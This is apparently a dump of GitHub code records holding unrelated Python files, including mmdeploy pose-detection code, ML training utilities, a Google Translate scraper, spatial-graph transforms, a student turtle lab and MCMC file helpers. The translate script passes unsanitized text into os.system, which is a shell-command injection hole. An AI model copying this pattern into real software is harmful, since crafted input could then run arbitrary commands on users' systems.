Defaults to\n an empty string.\n show_result (bool): Whether to show result in windows, defaults\n to `False`.\n \"\"\"\n from mmpose.apis.inference import dataset_meta_from_config\n from mmpose.visualization import PoseLocalVisualizer\n\n save_dir, filename = os.path.split(output_file)\n name = os.path.splitext(filename)[0]\n dataset_meta = dataset_meta_from_config(\n self.model_cfg, dataset_mode='test')\n visualizer = PoseLocalVisualizer(name=name, save_dir=save_dir)\n visualizer.set_dataset_meta(dataset_meta)\n\n if isinstance(image, str):\n image = mmcv.imread(image, channel_order='rgb')\n draw_bbox = result.pred_instances.bboxes is not None\n if draw_bbox and isinstance(result.pred_instances.bboxes,\n torch.Tensor):\n result.pred_instances.bboxes = result.pred_instances.bboxes.cpu(\n ).numpy()\n visualizer.add_datasample(\n name,\n image,\n data_sample=result,\n draw_gt=False,\n draw_bbox=draw_bbox,\n show=show_result,\n out_file=output_file)\n\n def get_model_name(self, *args, **kwargs) -> str:\n \"\"\"Get the model name.\n\n Return:\n str: the name of the model.\n \"\"\"\n assert 'type' in self.model_cfg.model, 'model config contains no type'\n name = self.model_cfg.model.type.lower()\n return name\n\n @staticmethod\n def get_partition_cfg(partition_type: str, **kwargs) -> Dict:\n \"\"\"Get a certain partition config for mmpose.\n\n Args:\n partition_type (str): A string specifying partition type.\n \"\"\"\n raise NotImplementedError('Not supported yet.')\n\n def get_preprocess(self, *args, **kwargs) -> Dict:\n \"\"\"Get the preprocess information for SDK.\n\n Return:\n dict: Composed of the preprocess information.\n \"\"\"\n input_shape = get_input_shape(self.deploy_cfg)\n model_cfg = process_model_config(self.model_cfg, [''], input_shape)\n preprocess = model_cfg.test_dataloader.dataset.pipeline\n return preprocess\n\n def get_postprocess(self, *args, **kwargs) -> Dict:\n \"\"\"Get the postprocess information for SDK.\"\"\"\n codec = self.model_cfg.codec\n if isinstance(codec, (list, tuple)):\n codec = codec[-1]\n component = 'UNKNOWN'\n params = copy.deepcopy(self.model_cfg.model.test_cfg)\n params.update(codec)\n if self.model_cfg.model.type == 'TopdownPoseEstimator':\n component = 'TopdownHeatmapSimpleHeadDecode'\n if codec.type == 'MSRAHeatmap':\n params['post_process'] = 'default'\n elif codec.type == 'UDPHeatmap':\n params['post_process'] = 'default'\n params['use_udp'] = True\n elif codec.type == 'MegviiHeatmap':\n params['post_process'] = 'megvii'\n params['modulate_kernel'] = self.model_cfg.kernel_sizes[-1]\n elif codec.type == 'SimCCLabel':\n export_postprocess = get_codebase_config(self.deploy_cfg).get(\n 'export_postprocess', False)\n params['export_postprocess'] = export_postprocess\n component = 'SimCCLabelDecode'\n elif codec.type == 'RegressionLabel':\n component = 'DeepposeRegressionHeadDecode'\n elif codec.type == 'IntegralRegressionLabel':\n component = 'DeepposeRegressionHeadDecode'\n else:\n raise RuntimeError(f'Unsupported codecs type: {codec.type}')\n postprocess = dict(params=params, type=component)\n return postprocess\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmpose/deploy/pose_detection.py","file_name":"pose_detection.py","file_ext":"py","file_size_in_byte":14475,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20592311742","text":"import torch\n\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nfrom transformers import T5Tokenizer, 
T5ForConditionalGeneration,\\n PegasusTokenizer, PegasusModel, PegasusForConditionalGeneration, \\\n BartTokenizer, BartForConditionalGeneration\n\n\n\ndef build_tokenizer(args):\n tokenizer = None\n if args.model_type.startswith(\"bart\"):\n print(\"\\nUsing Bart tokenizer\")\n tokenizer = BartTokenizer.from_pretrained(args.model, cache_dir = args.cache_dir)\n elif args.model_type.startswith(\"pegasus\"):\n print(\"\\nUsing Pegasus tokenizer\")\n tokenizer = PegasusTokenizer.from_pretrained(args.model, cache_dir = args.cache_dir)\n\n return tokenizer\n\n\ndef build_model(args):\n model = None\n if args.model_type.startswith(\"bart\"):\n print(\"\\nUsing Bart model\")\n model = BartForConditionalGeneration.from_pretrained(args.model, cache_dir = args.cache_dir)\n elif args.model_type.startswith(\"pegasus\"):\n print(\"\\nUsing Pegasus model\")\n model = PegasusForConditionalGeneration.from_pretrained(args.model, cache_dir = args.cache_dir)\n\n return model\n\n\ndef build_optimizer(model, args):\n optimizer = None\n if args.optimizer == \"adam\":\n print(\"\\nUsing Adam\")\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n if args.optimizer == \"adamw\":\n print(\"\\nUsing AdamW\")\n optimizer = torch.optim.AdamW(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n return optimizer\n\n\ndef build_scheduler(optimizer, train_steps, args):\n scheduler = None\n if args.scheduler == \"linear_warmup\":\n print(\"\\nUsing linear warmup scheduler\")\n warmup_steps = int(args.warmup_ratio * train_steps)\n print(\"Number of warmup steps: {}\".format(warmup_steps))\n scheduler = get_linear_schedule_with_warmup(optimizer, warmup_steps, train_steps)\n\n return scheduler\n\n\ndef nested_detach(tensors):\n \"Detach `tensors` (even if it's a nested list/tuple of tensors).\"\n if isinstance(tensors, (list, tuple)):\n return type(tensors)(nested_detach(t) for t in tensors)\n\n return tensors.detach()\n","repo_name":"Ravoxsg/SummaReranker","sub_path":"src/base_model_finetuning/transfer_utils.py","file_name":"transfer_utils.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"}
{"seq_id":"22680397382","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport sys\nimport os\nimport json # import the json module\nimport urllib # import the urllib module\nfrom urllib import request, parse\nfrom urllib.error import URLError, HTTPError\nimport _md5\nimport datetime\nfrom lxml import etree\nimport refreshTKK\n\nTKK = refreshTKK.refreshTKK()\n\n\ndef translate(cnValue='english', tl='zh-CN'):\n global TKK\n os.system('node gettk.js > result ' + cnValue + ' ' + TKK)\n result = open('result', 'r')\n tk = result.read().replace('\\n', '')\n result.close()\n\n headers = {\n 'Upgrade-Insecure-Requests': 1,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36',\n }\n q = parse.quote(cnValue)\n url = 'https://translate.google.cn/translate_a/single?client=t&sl=auto&tl=' + tl + \\\n '&hl=zh-CN&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&source=btn&ssel=0&tsel=0&kc=0&tk=' + tk + '&q=' + q\n\n try:\n resultPage = request.urlopen(request.Request(url, headers=headers))\n # fetch the translation result; it comes back as JSON\n resultJason = resultPage.read().decode('utf-8')\n js = None\n try:\n # convert the JSON result into a Python dict structure\n js = json.loads(resultJason)\n result = js[0][0][0]\n print('result: ' + result)\n except Exception as e:\n print('loads Json error.')\n
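# also surface the underlying exception for debugging; result then falls\n # back to the untranslated input via the assignment below\n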
print(e)\n result = cnValue\n except HTTPError as e:\n print('The server couldn\\'t fulfill the request.')\n print('Error code: ', e.code)\n print('url: ', url)\n result = cnValue\n except URLError as e:\n print('We failed to reach a server.')\n print('Reason: ', e.reason)\n print('url: ', url)\n result = cnValue\n except Exception as e:\n print('translate error.')\n print(e)\n print('url: ', url)\n result = cnValue\n return result\n\n\ndef iteratorElem(element):\n for sub in element:\n try:\n cnValue = sub.attrib['value3']\n sub.attrib['value4'] = translate(cnValue, 'zh-TW')\n sub.attrib['value5'] = translate(cnValue, 'ar')\n sub.attrib['value6'] = translate(cnValue, 'fr')\n except KeyError as e:\n pass\n finally:\n iteratorElem(sub)\n\n\nif __name__ == '__main__':\n # walk the current working directory and translate every XML file found\n for rt, dirs, files in os.walk(os.getcwd() + os.sep):\n for f in files:\n if(not os.path.exists(os.getcwd() + os.sep + f)):\n continue\n fname = os.path.splitext(f)\n if fname[1].lower() == \".xml\":\n tree = etree.parse(f)\n root = tree.getroot()\n iteratorElem(root)\n tree.write(f, encoding=\"UTF-8\")\n","repo_name":"YScxw/learnPython","sub_path":"谷歌翻译.py","file_name":"谷歌翻译.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17982882621","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom dance.transforms.base import BaseTransform\nfrom dance.typing import Sequence\nfrom dance.utils.matrix import pairwise_distance\n\n\nclass SpaGCNGraph(BaseTransform):\n\n _DISPLAY_ATTRS = (\"alpha\", \"beta\")\n\n def __init__(self, alpha, beta, *, channels: Sequence[str] = (\"spatial\", \"spatial_pixel\", \"image\"),\n channel_types: Sequence[str] = (\"obsm\", \"obsm\", \"uns\"), **kwargs):\n \"\"\"Initialize SpaGCNGraph.\n\n Parameters\n ----------\n alpha\n Controls the color scale.\n beta\n Controls the range of the neighborhood when calculating grey values for one spot.\n\n \"\"\"\n super().__init__(**kwargs)\n\n self.alpha = alpha\n self.beta = beta\n self.channels = channels\n self.channel_types = channel_types\n\n def __call__(self, data):\n xy = data.get_feature(return_type=\"numpy\", channel=self.channels[0], channel_type=self.channel_types[0])\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channels[1], channel_type=self.channel_types[1])\n img = data.get_feature(return_type=\"numpy\", channel=self.channels[2], channel_type=self.channel_types[2])\n self.logger.info(\"Start calculating the adjacency matrix using the histology image\")\n\n g = np.zeros((xy.shape[0], 3))\n beta_half = round(self.beta / 2)\n x_lim, y_lim = img.shape[:2]\n for i, (x_pixel, y_pixel) in enumerate(xy_pixel):\n top = max(0, x_pixel - beta_half)\n left = max(0, y_pixel - beta_half)\n bottom = min(x_lim, x_pixel + beta_half + 1)\n right = min(y_lim, y_pixel + beta_half + 1)\n local_view = img[top:bottom, left:right]\n g[i] = np.mean(local_view, axis=(0, 1))\n g_var = g.var(0)\n self.logger.info(f\"Variances of c0, c1, c2 = {g_var}\")\n\n z = (g * g_var).sum(1, keepdims=True) / g_var.sum()\n z = (z - z.mean()) / z.std()\n z *= xy.std(0).max() * self.alpha\n\n xyz = np.hstack((xy, z)).astype(np.float32)\n self.logger.info(f\"Variances of x, y, z = {xyz.var(0)}\")\n data.data.obsp[self.out] = pairwise_distance(xyz, dist_func_id=0)\n\n return data\n\n\nclass 
SpaGCNGraph2D(BaseTransform):\n\n def __init__(self, *, channel: str = \"spatial_pixel\", **kwargs):\n super().__init__(**kwargs)\n\n self.channel = channel\n\n def __call__(self, data):\n x = data.get_feature(channel=self.channel, channel_type=\"obsm\", return_type=\"numpy\")\n data.data.obsp[self.out] = pairwise_distance(x.astype(np.float32), dist_func_id=0)\n return data\n\n\nclass SMEGraph(BaseTransform):\n \"\"\"Spatial Morphological gene Expression graph.\"\"\"\n\n def __init__(self, radius: float = 3, *,\n channels: Sequence[str] = (\"spatial\", \"spatial_pixel\", \"MorphologyFeature\", \"CellPCA\"),\n channel_types: Sequence[str] = (\"obsm\", \"obsm\", \"obsm\", \"obsm\"), **kwargs):\n super().__init__(**kwargs)\n\n self.radius = radius\n self.channels = channels\n self.channel_types = channel_types\n\n def __call__(self, data):\n xy = data.get_feature(return_type=\"numpy\", channel=self.channels[0], channel_type=self.channel_types[0])\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channels[1], channel_type=self.channel_types[1])\n morph_feat = data.get_feature(return_type=\"numpy\", channel=self.channels[2], channel_type=self.channel_types[2])\n gene_feat = data.get_feature(return_type=\"numpy\", channel=self.channels[3], channel_type=self.channel_types[3])\n\n reg_x = LinearRegression().fit(xy[:, 0:1], xy_pixel[:, 0:1])\n reg_y = LinearRegression().fit(xy[:, 1:2], xy_pixel[:, 1:2])\n unit = np.sqrt(reg_x.coef_**2 + reg_y.coef_**2)\n\n # TODO: only captures topk, which are the ones that will be used by SMEFeature.\n pdist = pairwise_distances(xy_pixel, metric=\"euclidean\")\n adj_p = np.where(pdist >= self.radius * unit, 0, 1)\n adj_m = (1 - pairwise_distances(morph_feat, metric=\"cosine\")).clip(0)\n adj_g = 1 - pairwise_distances(gene_feat, metric=\"correlation\")\n adj = adj_p * adj_m * adj_g\n\n data.data.obsp[self.out] = adj\n\n\nclass StagateGraph(BaseTransform):\n \"\"\"STAGATE spatial graph.\n\n Parameters\n ----------\n model_name\n Type of graph to construct. Currently support ``radius`` and ``knn``. 
See\n :class:`~sklearn.neighbors.NearestNeighbors` for more info.\n radius\n Radius parameter for ``radius_neighbors_graph``.\n n_neighbors\n Number of neighbors for ``kneighbors_graph``.\n\n \"\"\"\n\n _MODELS = (\"radius\", \"knn\")\n _DISPLAY_ATTRS = (\"model_name\", \"radius\", \"n_neighbors\")\n\n def __init__(self, model_name: str = \"radius\", *, radius: float = 1, n_neighbors: int = 5,\n channel: str = \"spatial_pixel\", channel_type: str = \"obsm\", **kwargs):\n super().__init__(**kwargs)\n\n if not isinstance(model_name, str) or (model_name.lower() not in self._MODELS):\n raise ValueError(f\"Unknown model {model_name!r}, available options are {self._MODELS}\")\n self.model_name = model_name\n self.radius = radius\n self.n_neighbors = n_neighbors\n self.channel = channel\n self.channel_type = channel_type\n\n def __call__(self, data):\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channel, channel_type=self.channel_type)\n\n if self.model_name.lower() == \"radius\":\n adj = NearestNeighbors(radius=self.radius).fit(xy_pixel).radius_neighbors_graph(xy_pixel)\n elif self.model_name.lower() == \"knn\":\n adj = NearestNeighbors(n_neighbors=self.n_neighbors).fit(xy_pixel).kneighbors_graph(xy_pixel)\n\n data.data.obsp[self.out] = adj\n","repo_name":"OmicsML/dance","sub_path":"dance/transforms/graph/spatial_graph.py","file_name":"spatial_graph.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":269,"dataset":"github-code","pt":"53"} +{"seq_id":"37661577616","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport json\nfrom xor.utils import NumpyArrayEncoder\nimport logging\n\n# Build and train the model\ndef build_and_train_model(features, labels, hidden_layer = '8', epochs = '5000', lr = '0.01'):\n\n features = torch.from_numpy(np.array(features).astype(np.float32))\n labels = torch.from_numpy(np.array(labels).astype(np.float32).reshape(-1,1))\n \n # Join the features and labels\n data = [d for d in zip(features, labels)]\n\n #Build the model\n model = nn.Sequential(nn.Linear(2, int(hidden_layer)),\n nn.ReLU(),\n nn.Linear(int(hidden_layer), 1))\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = optim.SGD(model.parameters(), lr = np.float32(lr))\n\n running_losses = []\n\n # Train the model\n for e in range(int(epochs)):\n running_loss = 0\n for data_point in data:\n feature = data_point[0]\n label = data_point[1]\n optimizer.zero_grad()\n output = model(feature)\n loss = criterion(output, label)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if e % (int(epochs)/10) == 0:\n #print(f\"Epoch: {e}, Training loss: {running_loss}\")\n running_losses.append(running_loss)\n return model\n\n# Make predictions using the model\ndef predict(model, features, labels):\n features = torch.from_numpy(np.array(features).astype(np.float32))\n labels = torch.from_numpy(np.array(labels).astype(np.float32).reshape(-1,1))\n\n sigmoid = nn.Sigmoid()\n predictions = []\n for f in features:\n predictions.append(sigmoid(model(f)).detach().numpy())\n predictions = np.array(predictions)\n return json.dumps(predictions, cls=NumpyArrayEncoder)\n","repo_name":"luisguiserrano/xor-orquestra","sub_path":"src/python/xor/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25404684117","text":"#Go to 'Main' on line 195 to test questions 2, 3, or 
5\r\n\r\n\r\n\r\n\r\n#\r\n#Question 1:\r\n# Returns:\r\n# -turtle.stamp() returns a stamp id so in the future we can\r\n# reference/delete\r\n# -turtle.speed() returns the current speed if none is specified\r\n# -turtle.pos() returns the x and y coordinates of the turtle's\r\n# current position\r\n# Does not return:\r\n# -turtle.forward() doesn't need to return because it's a one time\r\n# event\r\n# -turtle.back() also doesn't need to return because it's a one\r\n# time event\r\n# -turtle.right() doesn't need to return because it's a one time\r\n# event\r\n#\r\n\r\nimport math\r\nimport turtle\r\n\r\n\r\n\r\n\r\n#Question 2 to be called in Main\r\ndef Question_2():\r\n \"\"\"Implement a function called circleArea that calculates the area\r\nof a circle given the circle’s radius. Have the function print the value\r\nof the area and return nothing to the calling program. Verify that the\r\nfunction is working correctly by calling the function several times with\r\ndifferent radius values. \"\"\"\r\n\r\n #define constants\r\n RADIUS = 10\r\n\r\n\r\n #call function circlearea\r\n CircleArea(RADIUS)\r\n\r\ndef CircleArea(r):\r\n area = (math.pi) * (r ** 2)\r\n print(area)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Question 3 to be called in Main\r\ndef Question_3():\r\n \"\"\"Make a copy of your python program for exercise 2 and change the\r\nfunction so that it prints nothing and returns the area value it\r\ncalculated. Verify that the function is working correctly by calling the\r\nfunction several times with different radius values. Note that you will\r\nhave to make the calling program print out the value.\"\"\" \r\n\r\n #define constants\r\n RADIUS = 10\r\n\r\n\r\n #call function circlearea to print area\r\n CircleArea2(RADIUS)\r\n \r\n result = CircleArea2(RADIUS)\r\n print(result)\r\n\r\ndef CircleArea2(r):\r\n area = (math.pi) * (r **2)\r\n return area\r\n\r\n\r\n\r\n\r\n#Question 5i to be called in Main\r\ndef Question_5i():\r\n \"\"\"Fairly simple math will calculate the sides and angles of the\r\ninside square. If we assume that the distance “a” is some fraction of\r\nthe size of the blue square the calculations are:\r\n a = fraction * size\r\n b = size - a\r\n size' = sqrt(a^2 + b^2)\r\n α = tan^(-1)(a/b) (in python, atan2(a,b))\r\nImplement a function that will draw the red square. The \r\nfunction should have 3 input parameters: a turtle, the size of the blue square, and the \r\nfraction used to calculate “a”.\"\"\"\r\n\r\n #define constants and make graphics window\r\n wn = turtle.Screen()\r\n wn.bgcolor(\"white\")\r\n t = turtle.Turtle()\r\n \r\n FRACTION = (1/5)\r\n SIZE = 60\r\n\r\n\r\n #math needed to draw squares\r\n a = FRACTION * SIZE\r\n b = SIZE - a\r\n SIZE2 = math.sqrt( a**2 + b**2)\r\n alpha = math.degrees(math.atan2(a,b))\r\n\r\n\r\n #draw the blue, then red squares\r\n drawSquares(t, SIZE, SIZE2, b, alpha)\r\n wn.exitonclick()\r\n\r\n\r\ndef drawSquares(t, SIZE, SIZE2, b, alpha):\r\n\r\n #draw blue square\r\n t.color(\"blue\")\r\n for i in range(4):\r\n t.forward(SIZE)\r\n t.left(90)\r\n\r\n #draw red square\r\n t.color(\"red\")\r\n TURN = 90 - alpha\r\n t.penup()\r\n t.forward(b)\r\n t.pendown()\r\n t.left(180)\r\n t.right(alpha)\r\n for i in range(4):\r\n t.forward(SIZE2)\r\n t.right(90)\r\n\r\n\r\n\r\n\r\n\r\n#Question 5ii to be called in Main\r\ndef Question_5ii():\r\n \"\"\"Now let’s use the previous function to draw multiple inside squares\r\nCreate a new function that draws multiple squares inside a square. 
This\r\nfunction should also have three parameters: a turtle, the size of the\r\noutside square, and the number of inside squares to draw. This function\r\nshould call the function you have already created to draw an inside square\r\nYou should now be able to draw shapes that look like the figures to the\r\nright. The shapes have 2, 4, and 9 inside squares.\r\"\"\"\r\n\r\n #define constants and make graphics window\r\n wn = turtle.Screen()\r\n wn.bgcolor(\"white\")\r\n t = turtle.Turtle()\r\n \r\n FRACTION = (1/5)\r\n SIZE = 60\r\n\r\n\r\n #math needed to draw squares\r\n a = FRACTION * SIZE\r\n b = SIZE - a\r\n SIZE2 = math.sqrt( a**2 + b**2)\r\n alpha = math.degrees(math.atan2(a,b))\r\n\r\n\r\n #draw the blue squares\r\n drawSquares(t, SIZE, SIZE2, b, alpha)\r\n wn.exitonclick()\r\n\r\n\r\ndef drawSquares(t, SIZE, SIZE2, b, alpha):\r\n\r\n #draw main square\r\n t.color(\"blue\")\r\n for i in range(4):\r\n t.forward(SIZE)\r\n t.left(90)\r\n\r\n #draw other squares\r\n\r\n\r\n\r\n\r\n\r\n#Main\r\n#Question_2()\r\n#Question_3()\r\n#Question_5i()\r\n#Question_5ii()\r\n\r\n\r\n\r\n\r\n#\r\n#Question 4:\r\n# i: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# ii: No on exercise 2 because you print the answer twice. Yes on\r\n# exercise 3.\r\n# iii: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# iv: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# v: No on both exercises. This equation is showing how to find the\r\n# area. It's a boolean expression that would have the value 'true'\r\n#\r\n","repo_name":"NathanRuprecht/CS210_IntroToProgramming","sub_path":"DailyLabs/Lab07/Lab07.py","file_name":"Lab07.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2868111605","text":"import PyPDF2\nimport os\nimport re\n\ndef parse_string(line):\n\tline=line.replace(\"\\n\",\"\")\n\tk=re.search(\"\\d\",line).start()\n\tdate=line[k]\n\ttry:\n\t\tint(line[k+1])\n\t\tdate=date+line[k+1]\n\t\tinfo=line[k+2:]\n\texcept:\n\t\tinfo=line[k+1:]\n\n\tday=line[:k]\n\tday=day.replace(\" \",\"\")\n\treturn [date,day,info.strip()]\n\n\n\npdfFile=open(\"AcademicCalendar.pdf\",\"rb\")\nfo=open(\"cleaned.csv\",\"w\")\n\nreader=PyPDF2.PdfFileReader(pdfFile)\ndays=[\"mon\",\"tue\",\"wed\",\"thu\",\"fri\",\"sat\",\"sun\"]\nmonth=[\"JUNE\",\"JULY\",\"AUGUST\",\"SEPTEMBER\",\"OCTOBER\",\"NOVEMBER\",\"DECEMBER\",\"JANUARY\",\"FEBRUARY\",\"MARCH\",\"APRIL\",\"MAY\",\"JUNE\"]\n#reader.numPages\nfor x in range(reader.numPages):\n\t#print \"\\nMONTH : \",month[x],\"\\n\"\n\tfo.write(month[x]+\"\\n\")\n\tdata=reader.getPage(x).extractText()\n\tj=0\n\tlength=len(data)\n\t\n\twhile j+3<=length:\n\n\t\ttemp=data[j:j+3]\n\n\t\tif temp.lower() in days: \n\t\t\tvarint=j\n\t\t\tj=j+3\n\t\t\ti=(days.index(temp.lower())+1)%7\n\n\t\t\twhile True:\n\t\t\t\ttemp1=data[j:j+3]\n\n\t\t\t\tif temp1.lower()==days[i]:\n\t\t\t\t rawdata=data[varint:j].split(\"\\n\")\n\t\t\t\t rawdata=\" \".join(rawdata)\n\t\t\t\t rawdata=parse_string(rawdata)\n\t\t\t\t #print rawdata\n\t\t\t\t rawdata=\",\".join(rawdata)+\"\\n\"\n\t\t\t\t fo.write(rawdata) \n\t\t\t\t j=j-1\n\t\t\t\t break\n\n\t\t\t\tif j+3>=length:\n\t\t\t\t rawdata=data[varint:].split(\"\\n\")\n\t\t\t\t rawdata=\" \".join(rawdata)\n\t\t\t\t rawdata=parse_string(rawdata)\n\t\t\t\t #print rawdata\n\t\t\t\t rawdata=\",\".join(rawdata)+\"\\n\"\n\t\t\t\t fo.write(rawdata) 
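\n\t\t\t\t # end of this page's text: the final entry has been written, so stop scanning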
\n\t\t\t\t break\n\n\t\t\t\tj=j+1\n\t\tj=j+1\n\t#print \"\\n\\n\"\n\nfo.close()\n\t\t\t\t\n\n","repo_name":"Ajithkumarsekar/KCT-Academic-Calendar-Converter","sub_path":"KCT-Calendar/academic.py","file_name":"academic.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"24675341693","text":"from django.shortcuts import render\nfrom .models import Post\nposts = [\n {\n 'Author': 'rahul',\n 'Title': 'blog 1st Post 1',\n 'content': 'content of 1st post 1',\n 'date_posted': 'oct 27, 2021'\n },\n {\n 'Author': 'testuser',\n 'Title': 'blog 1st Post 2',\n 'content': 'content of 1st post 2',\n 'date_posted': 'oct 28, 2021'\n }\n]\n\ndef home(request):\n context = {\n 'posts': Post.objects.all()\n }\n return render(request, 'blog/home.html', context)\n\ndef about(request):\n return render(request, 'blog/about.html', {'Title': 'About'})","repo_name":"rahul-mn/django-jenkins-docker-k8s-files","sub_path":"django_test/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26277295974","text":"\n# coding: utf-8\n\n# # Save and Inspect the state\n\n# In[66]:\n\n\nimport os\nimport numpy as np\n\n\n# In[67]:\n\n\ndef save_state(data_store, step, state, value, accepted_p, \n mean=None, covariance=None, scale=None, threshold=None, C_evol_pt=None):\n data_store['States'][step] = state\n data_store['Densities'][step] = value\n data_store['Accepted_p'][step] = accepted_p\n data_store['Means'][step] = mean \n data_store['Covariances'][step] = covariance \n data_store['Scales'][step] = scale\n data_store['Thresholds'][step] = threshold\n \ndef inspect_state(data_store, step):\n state = data_store['States'][step]\n value = data_store['Densities'][step] \n accepted_p = data_store['Accepted_p'][step] \n mean = data_store['Means'][step] \n covariance = data_store['Covariances'][step] \n scale = data_store['Scales'][step]\n threshold = data_store['Thresholds'][step] \n print(\"State:\", state, \"R: \", scale, \"\\nThreshold: \", threshold, \"\\nState: \", state, \n \"\\nIt's value: \", value, \"\\nMean: \", mean, \n \"\\nCovariance: \", covariance)\n\n\n# # Save in the file format used by *PyMC3*\n\n# ## Structure of the data directory\n# \n# The directory structure of 'Data' is as follows\n# \n# 1. for each dimension $d$ of the state space, 'Data' contains a folder 'Dim d' \n# 2. for each target, 'Dim d' contains a folder 'Target k' where $k$ is the index of \n# that targets in the test suite\n# 3. for each sampler, 'Target k' contains a folder named after that sampler\n# 4. for each run given the dimension of the state space, the target and the sampler, \n# a file 'chain_i' is generated where $i$ is the index of the run. \n# \n# \n# The global variable PARENT_FOLDER contains the parent folder, i.e. 
the folder where the experimental data will be stored, e.g.\n# \n# PARENT_FOLDER = '/Users/BM/Documents/Programming/Python/Notebooks/MCMC/To execute a run'\n# \n# The functions below assume that the parent folder is correctly set.\n\n# In[68]:\n\n\ndef relative_path_to_chain(dim, t_name, s_name):\n    data_folder = 'Data'\n    dim_folder = 'Dimension_{}'.format(dim)\n    target_folder = t_name\n    sampler_folder = s_name\n    return './'+'/'.join([data_folder, dim_folder, target_folder, sampler_folder])\n\nclass ChDir(object):\n    \"\"\"\n    Step into a directory temporarily.\n    \"\"\"\n    def __init__(self, path):\n        self.old_dir = os.getcwd()\n        self.new_dir = path\n    \n    def __enter__(self):\n        os.chdir(self.new_dir)\n    \n    def __exit__(self, *args):\n        os.chdir(self.old_dir)\n\ndef save_chain(chain, idx, individual_components_p=True):\n    \"\"\"Save a single-chain trace with index 'idx'. PyMC3 uses the labels x__0, x__1, x__2, etc.\n    for a vector when they are regarded as COMPONENTS of that vector. \n    If we want to treat them INDIVIDUALLY the labels x_0, x_1, x_2, etc. have to be used. \n    That is, we use a double versus a single underscore.\n    \"\"\"\n    chain_name = 'chain-{}.csv'.format(idx)\n    _, nbcols = chain.shape\n    underscore = '_' if individual_components_p else '__'\n    varnames = ['x{}{}'.format(underscore, index) for index in range(nbcols)]\n    header = ','.join(varnames)\n    np.savetxt(fname=chain_name, X=chain, header=header, comments='', delimiter=',')\n\ndef save_run_data(run_data, parent_folder):\n    warning = 'Parent Folder \\'%s\\' does NOT exist'%(parent_folder)\n    if not os.path.exists(parent_folder):\n        return warning\n    chain = run_data.DataStore['States']\n    chain_folder = relative_path_to_chain(dim=run_data.StateSpace['dim'],\n                                          t_name=run_data.Target['Name'] , \n                                          s_name=run_data.Sampler['Name'])\n    if not os.path.exists(chain_folder):\n        os.makedirs(chain_folder)\n    with ChDir(chain_folder):\n        nbfiles = len(os.listdir())\n        save_chain(chain=chain, idx=nbfiles)\n\ndef save_comparison(combined_data, parent_folder):\n    for i, run_data in enumerate(combined_data):\n        save_run_data(run_data, parent_folder)\n\n\n# In[75]:\n\n\ndef read_states(f_name, dim, t_name, s_name):\n    chains_folder = relative_path_to_chain(dim=dim, t_name=t_name, s_name=s_name)\n    with ChDir(chains_folder):\n        return np.loadtxt(fname=f_name, skiprows=1, delimiter=',')\n\n","repo_name":"philipk01/Optimization_and_Sampling_for_Bayesian_Inference","sub_path":"FileHandling.py","file_name":"FileHandling.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"}
{"seq_id":"4007189411","text":"# question's link : https://leetcode.com/problems/contains-duplicate-ii/description/\nfrom typing import List\nclass Solution:\n    def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n        dic = {}\n        for i, v in enumerate(nums):\n            if v in dic and i - dic[v]<=k:\n                return True\n            dic[v] = i\n        return False\n\ns = Solution()\nnums = list(map(int,input().split(\",\")))\nk = int(input())\nprint(s.containsNearbyDuplicate(nums,k))\n","repo_name":"anirbang324/problem-solving-codechef-geeksforgeeks-hackerrank_and_leetcode_easy_-_medium_questions","sub_path":"219. Contains Duplicate II - leetcode.py","file_name":"219. 
Contains Duplicate II - leetcode.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
